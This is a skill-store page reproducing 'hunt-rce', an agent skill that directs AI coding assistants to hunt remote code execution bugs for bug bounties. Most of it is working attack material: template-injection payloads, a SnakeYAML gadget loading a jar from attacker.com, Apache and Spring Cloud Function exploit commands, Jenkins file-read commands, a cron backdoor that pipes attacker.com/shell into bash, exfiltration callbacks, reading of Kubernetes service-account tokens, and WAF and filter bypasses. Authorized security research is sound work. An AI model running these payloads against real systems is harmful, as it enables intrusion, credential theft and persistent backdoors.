‹ 首页

hunt-rce

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunting skill for rce vulnerabilities. Built from 67 public bug bounty reports. Use when hunting rce on any target.

适合你,如果正在对任意目标进行RCE漏洞挖掘

/ 下载安装
hunt-rce.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-rce
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-rce
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-rce
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~6.2K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会按照 67 份公开漏洞报告总结的方法,帮你系统性地寻找远程代码执行漏洞。它会指导你识别高价值目标、攻击面信号,并执行分步检测。

什么时候触发

当你要求 Claude 帮助寻找 RCE 漏洞,或提到相关关键词(如“命令执行”、“模板注入”)时触发。

装好后可以这样说
Claude 会按照技能中的方法论开始分析。
Claude 会指导你发送模板注入探测 payload。
技能原文 SKILL.md作者撰写 · MIT · 05098fc
Crown Jewel Targets

RCE vulnerabilities command the highest payouts in bug bounty programs because they grant attackers direct execution control over target infrastructure. The highest-value targets are:

Highest-paying asset types:

  • Enterprise server products (GitHub Enterprise Server, self-hosted GitLab) — privilege escalation chains from low-privileged console roles to root SSH access consistently pay critical/high
  • Supply chain / package registries — dependency confusion attacks against npm, PyPI, etc. hit critical severity across every major program
  • Cloud-native infrastructure — exposed Kubernetes API servers, ingress controllers, and misconfiqured CI/CD pipelines
  • Mobile app backends and OAuth flows — where server-side processing of attacker-controlled data meets execution contexts
  • Admin/management consoles — template injection in configuration panels reaches root with a single payload

Why this class pays most:

  • Blast radius is infrastructure-wide, not user-scoped
  • Proof-of-concept is unambiguous — shell output is undeniable
  • Fix requires architectural changes, not just a patch
  • Programs cannot afford false negatives on RCE

Attack Surface Signals
URL Patterns
/management-console/*
/admin/settings/*
/api/v*/exec
/api/v*/run
/webhook/*
/_internal/*
/import?url=
/render?template=
/preview?format=
Response Headers / Tech Stack Signals
X-Powered-By: Express          # Node.js — npm dependency surface
X-Powered-By: Phusion Passenger
Server: nginx (ingress-nginx)  # Kubernetes ingress — path field injection
X-Runtime: Ruby                # Rails ActiveStorage, RDoc, REXML attack surface
Content-Type: application/yaml # YAML parsers (SnakeYAML, Psych) — deserialization
X-GitHub-Enterprise-Version    # GHAS — nomad template, collectd, syslog-ng injection
JavaScript / Frontend Signals
// Look for these patterns in JS bundles
fetch('/api/exec', {method:'POST', body: cmd})
eval(userInput)
new Function(userInput)
document.write(unsafeData)
window.location = userControlled  // URL scheme bypass → JS execution
Tech Stack Signals

| Signal | RCE Vector | |--------|-----------| | nomad in config UI | Template injection → {{ ... }} | | syslog-ng config editable | Config injection → program() destination | | collectd config editable | Plugin exec injection | | SnakeYAML in classpath | !!javax.script.ScriptEngineManager [...] | | npm package.json internal scope | Dependency confusion | | ingress-nginx annotations | Path field regex bypass |


Step-by-Step Hunting Methodology
  1. Map the execution contexts first. Before testing payloads, identify everywhere user-controlled input touches an execution layer: template engines, shell commands, YAML parsers, file paths used in operations, package resolution, and configuration files.
  1. Enumerate admin/management interfaces. Crawl for /management-console, /admin, /_internal, /setup, /config. These surfaces are lower-auth and higher-privilege — the GHES cluster produced 6 separate RCEs from one console role.
  1. Check template injection in every config field. In any management UI that accepts free-form configuration (log destinations, notification formats, proxy settings), submit {{7*7}}, ${7*7}, <%= 7*7 %>. Look for 49 in responses, logs, or DNS callbacks.
  1. Test YAML/XML/serialized input for code execution. Any endpoint accepting Content-Type: application/yaml or application/xml:
  2. SnakeYAML: submit !!javax.script.ScriptEngineManager gadget
  3. Ruby YAML: submit !ruby/object:Gem::Installer gadget
  4. REXML: submit billion-laughs / quadratic blowup XML
  1. Hunt dependency confusion. For every npm/pip/gem internal package name visible in JS bundles, error messages, or package.json in public repos — register a higher-versioned package on the public registry pointing to a canary callback.
  1. Check file path operations for traversal → execution. ActiveStorage, file upload handlers, symlink operations: submit ../../../etc/cron.d/shell as filename. Confirm write then trigger execution.
  1. Audit Kubernetes/cloud-native surfaces. Run kubectl against any exposed API server. Check ingress annotations, especially nginx.ingress.kubernetes.io/configuration-snippet and spec.rules.http.paths.path for Lua/regex injection.
  1. Test OAuth redirect URI and URL scheme handlers. Mobile apps processing javascript: or intent:// URIs via OAuth redirect may execute JavaScript. Try javascript:alert(document.cookie) and custom scheme URIs.
  1. Verify with out-of-band callbacks. Never rely solely on visible output. Use Burp Collaborator, interactsh, or canarytokens.org DNS tokens. Blind RCE is common in backend processors.
  1. Chain privileges. A low-severity misconfiguration (editor role, CSRF, path traversal) combined with an RCE primitive equals critical. Always ask: "what can I reach from here?"

Payload & Detection Patterns
Template Injection Probes
# Generic polyglot — works across Jinja2, Twig, Freemarker, Pebble, Velocity
{{7*7}}${7*7}#{7*7}<%= 7*7 %>*{7*7}
{{'7'*7}}
{{config}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}

# Nomad template injection (Go text/template)
{{ env "NOMAD_SECRET_ID" }}
{{ with secret "secret/data/prod" }}{{ .Data.password }}{{ end }}
{{ runscript "id" }}
Apache HTTP Server alias path traversal (CVE-2021-41773 / CVE-2021-42013)

Path normalization bug in Apache 2.4.49 (and the 2.4.50 patch-bypass) lets an attacker escape DocumentRoot via dot-encoded segments through configured alias paths. The same primitive yields very different impact depending on which alias accepts the traversal:

  • Alias without Options +ExecCGI (e.g. /icons/) → arbitrary file read only
  • Alias with Options +ExecCGI (e.g. /cgi-bin/) → arbitrary code execution

Version fingerprint:

curl -sI http://target/ | grep -i "Server:"
# Vulnerable: Apache/2.4.49 (CVE-2021-41773) or Apache/2.4.50 (CVE-2021-42013)
# Patched:    Apache/2.4.51+

File-read test (any alias):

curl --path-as-is "http://target/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd"
# Note: --path-as-is is REQUIRED — curl normalizes %2e by default

RCE test (cgi-enabled alias only):

curl --path-as-is -X POST \
  -d "echo Content-Type: text/plain; echo; id; uname -a; hostname" \
  "http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Triage discipline note: when the same path-traversal primitive works on multiple aliases but only one is CGI-enabled, the maximum impact is the severity — not the average. A "file read" finding on /icons/ should always be escalated by re-probing /cgi-bin/ (and any other alias visible from <Directory> blocks in the server-info disclosure or response patterns). See triage-validation Pre-Severity Gate.

Spring Cloud Function SpEL injection (CVE-2022-22963)

Spring Cloud Function ≤ 3.2.2 (and ≤ 3.1.6) evaluates the spring.cloud.function.routing-expression header as a SpEL expression on the /functionRouter endpoint without auth, before any routing logic. Wide deployment in AWS Lambda + Cloud Run + on-prem function platforms. Often exposed externally because /functionRouter auto-registers and devs don't add an explicit gate.

Detection:

  • Spring-style port 8080 with /uppercase, /lowercase, or arbitrary single-word function endpoints responding 200
  • Confirm with curl -s http://target:8080/uppercase -H "Content-Type: text/plain" --data-binary "test" → returns TEST
  • Version banner via /actuator/info or response headers

Exploit:

curl -X POST http://target:8080/functionRouter \
  -H "Content-Type: text/plain" \
  -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{"id"})' \
  --data "x"

The new String[]{"...", "..."} array form avoids shell-quoting issues that break the more common .exec("id") form when the SpEL header contains parentheses or quotes.

Generalizes to: any Spring application that takes user input into a SpelExpressionParser.parseExpression() call, especially when delivered via header / query-param routes that bypass normal auth filters. See hunt-ssti for the broader SpEL fingerprinting (*{7*7} = Spring Thymeleaf).

SnakeYAML RCE Gadget
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker.com/exploit.jar"]
  ]]
]
Ruby YAML / rdoc_options RCE
--- !ruby/object:Gem::Installer
i: x
Dependency Confusion Detection
# Find internal package names
grep -r '"name"' node_modules/ | grep '@internal\|@company\|@private'
# Check if public registry has higher version
npm view @target-company/internal-package version 2>/dev/null
Ingress-nginx Path Injection
# In spec.rules.http.paths.path
/something)(;.*);#
# Results in nginx config injection
Kubernetes Exposed API Check
curl -sk https://TARGET:6443/api/v1/namespaces/default/pods \
  -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
kubectl --insecure-skip-tls-verify -s https://TARGET:6443 get pods --all-namespaces
Out-of-Band RCE Confirmation
# Payload to confirm blind RCE via DNS
curl "http://$(id | base64).YOUR-INTERACTSH-URL/"
nslookup $(whoami).attacker.com
wget http://attacker.com/$(cat /etc/hostname)
ActiveStorage Path Traversal → RCE
# Filename in upload request
filename="../../../../etc/cron.d/backdoor"
# Cron payload content
* * * * * root curl http://attacker.com/shell | bash
Args4j @-prefix file expansion (Jenkins CVE-2024-23897 family)

Java CLIs built on the args4j library default to expandAtFiles=true, which expands @filename arguments by reading the file and treating each line as a separate command argument. When such a CLI is exposed over HTTP (Jenkins CLI is the canonical case), the server-side error message echoes failed arguments back — turning argument echoing into an arbitrary file-read primitive. Unauthenticated when "anonymous read access" is on (Jenkins default for fresh installs).

Detection:

  • Target exposes /cli and /jnlpJars/jenkins-cli.jar (Jenkins family)
  • Or: any Java app whose CLI source uses args4j without expandAtFiles=false

Test (Jenkins):

# Get the legit CLI jar from the target
curl -sLO http://target:8080/jnlpJars/jenkins-cli.jar

# First line of file leaks via 'help' error
java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/etc/passwd
# → ERROR: Too many arguments: root:x:0:0:root:/root:/bin/bash

# Full file leaks via 'connect-node' (every line returned as a "no such agent" error)
java -jar jenkins-cli.jar -s http://target:8080/ -http connect-node @/etc/passwd
# → All passwd lines echoed back

# Recon: env vars + JENKINS_HOME path
java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/proc/self/environ

Crown-jewel files after JENKINS_HOME confirmed:

  • /var/jenkins_home/secret.key — master encryption key for stored credentials
  • /var/jenkins_home/secrets/master.key — derives the encryption key
  • /var/jenkins_home/credentials.xml — credential store (encrypted with secret.key — pair with offline decrypt tools)
  • /var/jenkins_home/users/*/config.xml — per-user API tokens (often unencrypted)
  • /var/jenkins_home/jobs/*/config.xml — pipeline configs that may inline AWS keys, SSH keys, registry tokens

Pattern generalizes beyond Jenkins. Any Java service that:

  1. Embeds args4j (most enterprise Java CLIs since 2010s)
  2. Exposes the CLI handler over HTTP (Jenkins, Hudson forks, custom internal tools)
  3. Returns argument-parsing errors verbatim to the client

→ same arbitrary-read primitive applies. Validation via triage-validation Reproducibility Gate: confirm the leak on at least 2 distinct commands (e.g., help and connect-node) and verify the file content actually appears in the response, not just a generic 500.

Grep Patterns for Source Review
# Command injection sinks
grep -rn "exec\|system\|popen\|spawn\|eval\|subprocess" --include="*.rb" .
grep -rn "Runtime.exec\|ProcessBuilder\|ScriptEngine" --include="*.java" .

# Template engine instantiation
grep -rn "Mustache\|Handlebars\|nunjucks\|render_template\|Template\(" .

# Unsafe YAML load
grep -rn "yaml\.load\b\|YAML\.load\b" . # without Loader= argument
grep -rn "Yaml()\|new Yaml()" --include="*.java" .

Common Root Causes

1. Configuration-as-code with insufficient sanitization Administrators edit configuration files (syslog-ng, collectd, nomad) through web UIs. Developers assume admin == trusted, so they pass field values directly into config files that support execution primitives (program() destinations, exec plugins, template functions).

2. Template engines in privileged contexts Go's text/template, Freemarker, Velocity, and Twig are used for system configuration rendering. When user-controlled strings reach these engines without sandboxing, arbitrary code follows.

3. Dependency confusion / namespace squatting Internal packages published to private registries without locking the public registry namespace. Build systems that prefer public registries by default, or that fall through to public when the private registry lacks a package.

4. Unsafe deserialization of YAML/XML Developers use YAML.load() without safe loaders, or new Yaml() (SnakeYAML) without type restrictions. Ruby's YAML.load and Java's SnakeYAML both support arbitrary object instantiation by default.

5. Path traversal in file operation chains Filenames accepted from user input are used in filesystem operations without normalization. Rails ActiveStorage, file upload handlers, and rdoc generators trust the filename parameter.

6. Assuming low-privilege roles can't reach execution contexts The GHES management console granted "Editor" roles access to configuration fields that touched shell execution. Developers assumed privilege boundaries existed at a higher architectural level.

7. Missing input validation on infrastructure-facing fields Ingress/nginx annotation values, Kubernetes spec fields, and webhook URLs are treated as opaque strings — but the downstream processor (nginx config generator, regex engine) interprets them as code.


Bypass Techniques
Bypass: Shell metacharacter filtering
# Blocked: ; | & ` $()
# Bypass using $IFS and encodings
cat${IFS}/etc/passwd
{cat,/etc/passwd}
$'\x63\x61\x74' /etc/passwd  # hex encoding
$(printf '\x63\x61\x74') /etc/passwd

# Newline injection when semicolons blocked
payload=$'\ncurl attacker.com\n'
Bypass: URL scheme allowlist (javascript: blocked)
# Mobile apps often block javascript: but miss:
jAvAsCrIpT:alert(1)          # case variation
javascript&#58;alert(1)      # HTML entity
javascript:void(alert(1))    # void wrapper
intent://attacker.com#Intent;scheme=javascript;...
data:text/html,<script>alert(1)</script>
Bypass: YAML safe_load / type restrictions
# If !!java.* is blocked, try legitimate classes with side effects
!!com.sun.rowset.JdbcRowSetImpl
  dataSourceName: 'ldap://attacker.com/a'
  autoCommit: true
# Or find allowlisted types with dangerous constructors
Bypass: npm scope restrictions
# If @company/* is monitored, look for unscoped internal names
# e.g., "internal-utils" instead of "@company/internal-utils"
# Public registries serve unscoped packages first
Bypass: Path traversal filters
# Basic filter bypass
../           → ..%2F → %2e%2e%2f → ....// 
# Double encoding
%252e%252e%252f
# Unicode normalization
..%c0%af  (overlong UTF-8)
# Null byte (older systems)
../../etc/passwd%00.jpg
Bypass: Template injection with output filtering
# If {{ }} is sanitized on output but not evaluation:
{% for x in range(1) %}{{ lipsum.__globals__.os.popen('id').read() }}{% endfor %}
# Blind — use DNS callback instead of output
{{ lipsum.__globals__.os.popen('nslookup $(id).attacker.com').read() }}
Bypass: WAF blocking exec, system, popen
# Ruby
send(:system, "id")
method(:exec).call("id")
Kernel.send(:`, "id")
Object.const_get(:Kernel).system("id")

Gate 0 Validation

Before writing the report, confirm all three:

1. What can the attacker DO right now? You must be able to demonstrate one of: execute id/whoami and capture the output, make a DNS/HTTP callback from the target server to your controlled host, write a file to the filesystem, or read /etc/passwd. "Might be able to" fails this gate.

2. What does the victim LOSE? Articulate the concrete impact: source code exfiltration, credential theft (database, API keys, cloud IAM), lateral movement to internal network, supply chain compromise of downstream users, data destruction. Generic "attacker gains RCE" fails — name the crown jewels at risk.

3. Can it be reproduced in 10 minutes from scratch? Write the reproduction steps before submitting. If you need more than: (a) a Burp request, (b) a payload file, and (c) a listener — simplify it. If reproduction requires a specific race condition, timing, or ephemeral state, document the exact conditions. Triagers who can't reproduce in one attempt will downgrade or close the report.


Real Impact Examples

Scenario A: Management Console Role → Root Shell (Enterprise Server) An attacker with a low-privileged "Management Console Editor" account on a GitHub Enterprise Server instance identified that the syslog-ng configuration UI accepted a free-form "destination" field. By injecting a program() destination containing a reverse shell command, the attacker caused the syslog-ng daemon (running as root) to execute arbitrary OS commands upon log receipt. The same attack surface was independently found in collectd's exec plugin configuration and nomad's job template rendering — all reachable from the same editor role. Impact: full root compromise of the enterprise git server hosting all organization source code, secrets, and CI/CD pipelines.

Scenario B: Dependency Confusion → RCE on Build Infrastructure A researcher enumerated internal npm package names by reviewing JavaScript bundles served from target CDN endpoints and public GitHub repositories belonging to a major payments platform. Several @internal/* scoped packages were referenced but not registered on the public npm registry. The researcher published higher-versioned packages with identical names containing a postinstall script that executed a canary callback. Within hours, the callback fired from multiple IP addresses belonging to the target's CI/CD build farm — confirming that every npm install on their build infrastructure executed attacker-controlled code. The same technique worked against a ride-sharing platform's internal tooling. Impact: arbitrary code execution on build servers with access to production deployment credentials and signing keys.

Scenario C: Exposed Kubernetes API → Cluster Takeover During reconnaissance on a target's cloud infrastructure, a researcher discovered a publicly accessible Kubernetes API server (port 6443) with overly permissive RBAC. Using default service account tokens and unauthenticated API calls, the researcher enumerated running pods, retrieved secrets from the default namespace (including database credentials and third-party API keys), and demonstrated the ability to spawn privileged pods with hostPID: true — enabling full node compromise. The Kubernetes cluster managed the target's core production services. Impact: access to all stored secrets, ability to deploy malicious workloads, and pivot to every service in the cluster.


Chains & Compositions (Senior Hunting)

RCE in 2020-2026 rarely arrives at a single sink. Every modern RCE is composed of (1) a primitive that puts attacker bytes onto the host or into a deserialization pipeline, plus (2) an exec gadget that interprets them. The chains below decompose six high-paying RCE shapes into their primitive components — each step is testable in isolation, the chain is what pays.

Chain 1 — SSRF + IMDSv1 + Leaked IAM Role → Lambda Invoke → Backend RCE (Capital One pattern)
  • A. SSRF on a server-side fetcher (link-preview, image proxy, webhook URL, PDF generator). Confirmed via Burp Collaborator OOB callback.
  • B. Point SSRF at AWS IMDSv1 metadata: http://169.254.169.254/latest/meta-data/iam/security-credentials/<role> → returns temporary STS credentials.
  • C. Use the credentials with aws lambda invoke --function-name <internal-function> — Lambda runs server-side code that the attacker can influence via the function's input parameter.
  • Impact: Full backend RCE in the Lambda context, plus pivot path to whatever else the role grants (S3 / DynamoDB / RDS).
  • Real shape: Capital One 2019 — $80M civil penalty, attacker conviction. SSRF in a WAF on EC2 → IMDSv1 → IAM role → 106M-record breach via S3 sync. Cross-refs hunt-ssrf Disclosed Report Citation #6.
Chain 2 — SQLi + COPY FROM PROGRAM → Direct OS-level RCE on Postgres Host
  • A. SQLi confirmed on a Postgres backend (boolean/time-based works; UNION not needed).
  • B. The DB user has either pg_read_server_files or COPY privileges (default for many AWS RDS / Google Cloud SQL roles when "admin" databases exist).
  • C. Stack a query: '; COPY users FROM PROGRAM 'curl http://attacker/x.sh | bash'; -- → Postgres shells out to /bin/sh -c <attacker command> → RCE as postgres user.
  • Impact: RCE as the database user, which on managed Postgres frequently has IAM credentials and direct access to other AWS resources.
  • Real shape: Multiple H1 disclosures 2020-2024 across SaaS apps backed by Postgres. Cross-refs hunt-sqli Disclosed Report Citation #12 and root cause discussion of FILE/xp_cmdshell privileges.
Chain 3 — Image Upload + Path Traversal in Filename + Misconfigured MIME Serving → Webshell
  • A. File upload accepts images (image/png, image/jpeg). The server saves with the user-supplied filename or only validates Content-Type, not actual content.
  • B. Upload a .aspx/.jsp/.php file with the correct image magic-bytes (GIF89a + PHP after) and a filename containing ../ to write outside the upload directory into the web-root (../../../public/webshell.php).
  • C. Request https://target/webshell.php?cmd=id — server's PHP/ASP.NET handler runs the script regardless of extension policy because the path doesn't pass through the upload-dir filter.
  • Impact: Unauthenticated or low-priv attacker gets webshell on the application server with the web-server's process privileges.
  • Real shape: Multiple disclosed H1 cases on legacy upload handlers; canonical pre-2020 RCE class. Pairs with hunt-file-upload (upload bypass table) and hunt-misc path-traversal patterns.
Chain 4 — Prototype Pollution + Lodash/Mongoose Gadget Chain → child_process.spawn → Node RCE
  • A. Identify prototype pollution sink — JSON merge / Object.assign / lodash _.merge / Node Object.create chain receiving attacker JSON.
  • B. Pollute Object.prototype.shell to true OR Object.prototype.env.NODE_OPTIONS to --require ./malicious.js. The polluted prototype reaches a downstream child_process.spawn or vm.runInThisContext.
  • C. Sink executes with attacker-controlled shell/env → attacker code runs in Node.js process context with full access to environment variables, AWS metadata, internal services.
  • Impact: Server-side JS execution from a JSON POST. Common in Express apps using body-parser + lodash.merge for config-merging.
  • Real shape: lodash.merge CVE-2018-16487, CVE-2019-10744, CVE-2020-8203; mongoose CVE-2024-53900 (cross-refs hunt-sqli Disclosed Report Citation #10 — same gadget family reaches Mongo $where instead of process).
Chain 5 — Unencrypted ViewState + Recovered MachineKey → ASP.NET Deserialization → RCE (ToolShell class)
  • A. Identify an ASP.NET endpoint where __VIEWSTATEENCRYPTED="" (ViewState is signed but not encrypted). Confirm via Burp / curl on form-bearing pages.
  • B. Recover the <machineKey> validationKey — via config leak (/web.config accessible), via subdomain takeover of a sibling app sharing the key, or via the CVE-2025-53771 ToolShell exploit chain that exfils the key on Subscription Edition.
  • C. Forge a ViewState using ysoserial.net --plugin=ViewState --validationkey=<key> with a TypeConfuseDelegate / WindowsIdentity payload. Submit to the endpoint. ASP.NET deserialises into a method-call gadget chain ending in Process.Start → RCE as the worker-process identity.
  • Impact: Full RCE on the IIS web front-end with whatever the AppPool identity grants — often NETWORK SERVICE (with SharePoint farm-account access) or higher.
  • Real shape: CVE-2025-53770 / 53771 ToolShell (July 2025 emergency advisory); SP2013 unpatched-by-EoL exposure. Cross-refs hunt-sharepoint ToolShell precondition chain and hunt-aspnet ViewState dual-parser anti-pattern.
Chain 6 — XXE + PHP expect:// Stream Wrapper → Direct RCE on Legacy PHP
  • A. XXE confirmed via OOB DTD callback (<!ENTITY % x SYSTEM "http://attacker/dtd">).
  • B. Target runs PHP with the expect extension enabled (rare in 2026, but still present on legacy hosts and some shared-hosting providers).
  • C. Send <!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo> — PHP's stream wrapper executes id through expect → output returned in entity expansion or via OOB.
  • Impact: RCE as the PHP/web-server user without needing a separate upload or SQLi primitive.
  • Real shape: Rockstar Games emblem editor XXE H1 #347139 (2018, $1,500); Adobe Commerce CosmicSting CVE-2024-34102 (XXE → RCE via crypt-key exfil). Cross-refs hunt-xxe Disclosed Report Citation #7 and #10.
Operator-level pattern

Every modern RCE chain has two halves: the bytes get there (SSRF, SQLi, upload, prototype-pollution, ViewState, XXE) and the bytes get interpreted (lambda invoke, COPY PROGRAM, webshell handler, child_process.spawn, deserializer gadget, expect://). Hunt for the first half; the second is usually one of the six above. If your first-half primitive doesn't compose with any of these — pause before submitting. "Could lead to RCE" is Low/Medium; "RCE demonstrated end-to-end" is Critical.

Cross-references:

  • hunt-ssrf — Chain 1
  • hunt-sqli — Chain 2
  • hunt-file-upload — Chain 3
  • hunt-api-misconfig (proto-pollution) — Chain 4
  • hunt-sharepoint + hunt-aspnet — Chain 5
  • hunt-xxe — Chain 6

Related Skills & Chains
  • hunt-ssti — Template engines that hit eval()/exec()/os.system() are RCE hiding behind a render call. Chain primitive: Jinja2 {{config.__class__.__init__.__globals__['os'].popen('id').read()}} reflected in email-template preview → unauthenticated RCE as the worker process.
  • hunt-file-upload — File-write primitives become RCE when the upload directory is web-served, processed by a deserializer, or loaded by a .htaccess/web.config. Chain primitive: SVG/PHP polyglot bypasses MIME check → direct GET /uploads/shell.php?cmd=id → RCE; or DOCX with phar:// stream wrapper → PHP object deserialization → RCE.
  • hunt-ssrf — When the RCE primitive lives on an internal-only endpoint (admin console, internal Redis, Jenkins script-console), gate it through an SSRF. Chain primitive: external SSRF → http://127.0.0.1:8080/manage/scriptText (Jenkins/Tomcat) → Groovy Runtime.exec → RCE; or SSRF → gopher://redis:6379 write to crontab → RCE.
  • hunt-aspnet — ASP.NET ViewState deserialization is a giant RCE class behind a known __VIEWSTATE parameter. Chain primitive: machineKey recovery (or leaked <machineKey> from web.config disclosure) → ysoserial.net -p ViewState -g TypeConfuseDelegate → RCE as IIS APPPOOL\<name>.
  • security-arsenal — Reach for the deserialization payload tree (ysoserial Java gadget chains, ysoserial.net for .NET ViewState/BinaryFormatter, Python pickle __reduce__, Ruby Marshal, PHP phar:// metadata, Node node-serialize IIFE) the moment you have a sink that accepts serialized bytes.
  • triage-validation — Apply the Pre-Severity Gate before claiming Critical. A "blind RCE" that turns out to be file-write-only with no execution path is not RCE; a sandboxed eval that can't reach os is at best Medium SSTI. Prove whoami/OOB DNS callback with a unique marker before writing the report.
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。